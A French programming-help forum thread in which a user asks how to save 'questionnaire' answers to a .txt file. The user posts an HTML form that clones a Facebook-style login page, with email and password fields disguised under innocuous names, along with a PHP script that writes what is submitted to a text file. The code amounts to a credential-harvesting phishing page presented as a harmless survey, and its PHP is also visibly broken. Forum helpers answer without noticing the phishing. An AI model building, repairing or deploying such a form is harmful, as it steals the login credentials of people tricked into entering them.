Sauvegarder les résultats d'un questionnaire dans un .txt
Résolu/Fermé
darcking
Messages postés
9
Statut
Membre
Dernière intervention
16 janvier 2016
-
15 janv. 2016 à 19:01
darcking Messages postés 9 Date d'inscription vendredi 15 janvier 2016 Statut Membre Dernière intervention 16 janvier 2016 - 15 janv. 2016 à 19:42
darcking Messages postés 9 Date d'inscription vendredi 15 janvier 2016 Statut Membre Dernière intervention 16 janvier 2016 - 15 janv. 2016 à 19:42
A voir également:
- Sauvegarder les résultats d'un questionnaire dans un .txt
- Lexer resultats - Télécharger - Sport
- Comment sauvegarder toutes les données de mon téléphone - Guide
- Sauvegarder favoris chrome - Guide
- Sauvegarder sms iphone - Guide
- Sauvegarder sms - Guide
2 réponses
Utilisateur anonyme
15 janv. 2016 à 19:04
15 janv. 2016 à 19:04
Bonsoir,
Avec un tout petit peu de recherche sur internet : https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql/913492-lisez-et-ecrivez-dans-un-fichier
Cordialement,
Avec un tout petit peu de recherche sur internet : https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql/913492-lisez-et-ecrivez-dans-un-fichier
Cordialement,
jordane45
Messages postés
38314
Statut
Modérateur
Dernière intervention
24 novembre 2024
4 705
15 janv. 2016 à 19:07
Bonjour
Qu'as tu essayé ??
Quel code as tu commence à écrire ??
Je ne fourni du code que quand c'est nécessaire ou que je suis motivé..... mais à condition que le "demandeur" fasse un minimum d'efforts. .. et qu'il ne réclame pas un travail tout fait ! ( à moins que tu payes... ?? Lol )
Qu'as tu essayé ??
Quel code as tu commence à écrire ??
Je ne fourni du code que quand c'est nécessaire ou que je suis motivé..... mais à condition que le "demandeur" fasse un minimum d'efforts. .. et qu'il ne réclame pas un travail tout fait ! ( à moins que tu payes... ?? Lol )
darcking
Messages postés
9
Statut
Membre
Dernière intervention
16 janvier 2016
Modifié par darcking le 15/01/2016 à 19:14
Modifié par darcking le 15/01/2016 à 19:14
<form id="form1" name="form1" method="post" action='updatetxt.php' enctype='multipart/form-data'><div class="pam uiBoxYellow">Vous devez vous connecter pour continuer.</div><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value=""><input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value=""><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value=""><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="1"><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value=""><input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value=""><input type="hidden" autocomplete="off" id="signed_next" name="signed_next" value=""><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1"><input type="hidden" autocomplete="off" name="timezone" value="-60" id="u_0_0"><input type="hidden" autocomplete="off" name="lgndim" value="eyJ3IjoxNjAwLCJoIjo5MDAsImF3IjoxNjAwLCJhaCI6ODYwLCJjIjoyNH0=" id="u_0_1"><input type="hidden" name="lgnrnd" value="090928_-M90"><input type="hidden" id="lgnjs" name="lgnjs" value="1452704946"><div class="form_row clearfix"><div class=""><label class="login_form_label">Adresse e-mail ou mobile :</label><input type="text" name="prenom"></div></div><div class="form_row clearfix"><div class=""><label class="login_form_label">Mot de passe :</label><input type="password" name="nom"></div></div><div class="persistent"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input id="persist_box" type="checkbox" value="1" name="persistent" class="uiInputLabelInput uiInputLabelCheckbox"><label for="persist_box" class="uiInputLabelLabel">Garder ma session active</label></div></div><input type="hidden" autocomplete="off" id="default_persistent" name="default_persistent" value="0"><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" id="loginbutton" for="u_0_2"><input value="Connexion" name="login" tabindex="1" type="submit" id="u_0_2"></label></div>
voici le code du formulaire
et le code de uploadtxt.php
<?php
$contenu = stripslashes((htmlentities($_POST['textarea'])));
$fichierouvert = fopen ("inclure.txt");
if (fwrite($fichierouvert, $contenu)) {
echo "Impossible d'écrire dans le fichier ($filename)";
exit;
}
?>
voici le code du formulaire
et le code de uploadtxt.php
<?php
$contenu = stripslashes((htmlentities($_POST['textarea'])));
$fichierouvert = fopen ("inclure.txt");
if (fwrite($fichierouvert, $contenu)) {
echo "Impossible d'écrire dans le fichier ($filename)";
exit;
}
?>
darcking
Messages postés
9
Statut
Membre
Dernière intervention
16 janvier 2016
15 janv. 2016 à 19:42
15 janv. 2016 à 19:42
merci a tous j'ai finalement réussi en enlevant une petite erreur de ma part dans ma ligne de code
15 janv. 2016 à 19:10
15 janv. 2016 à 19:15
15 janv. 2016 à 19:26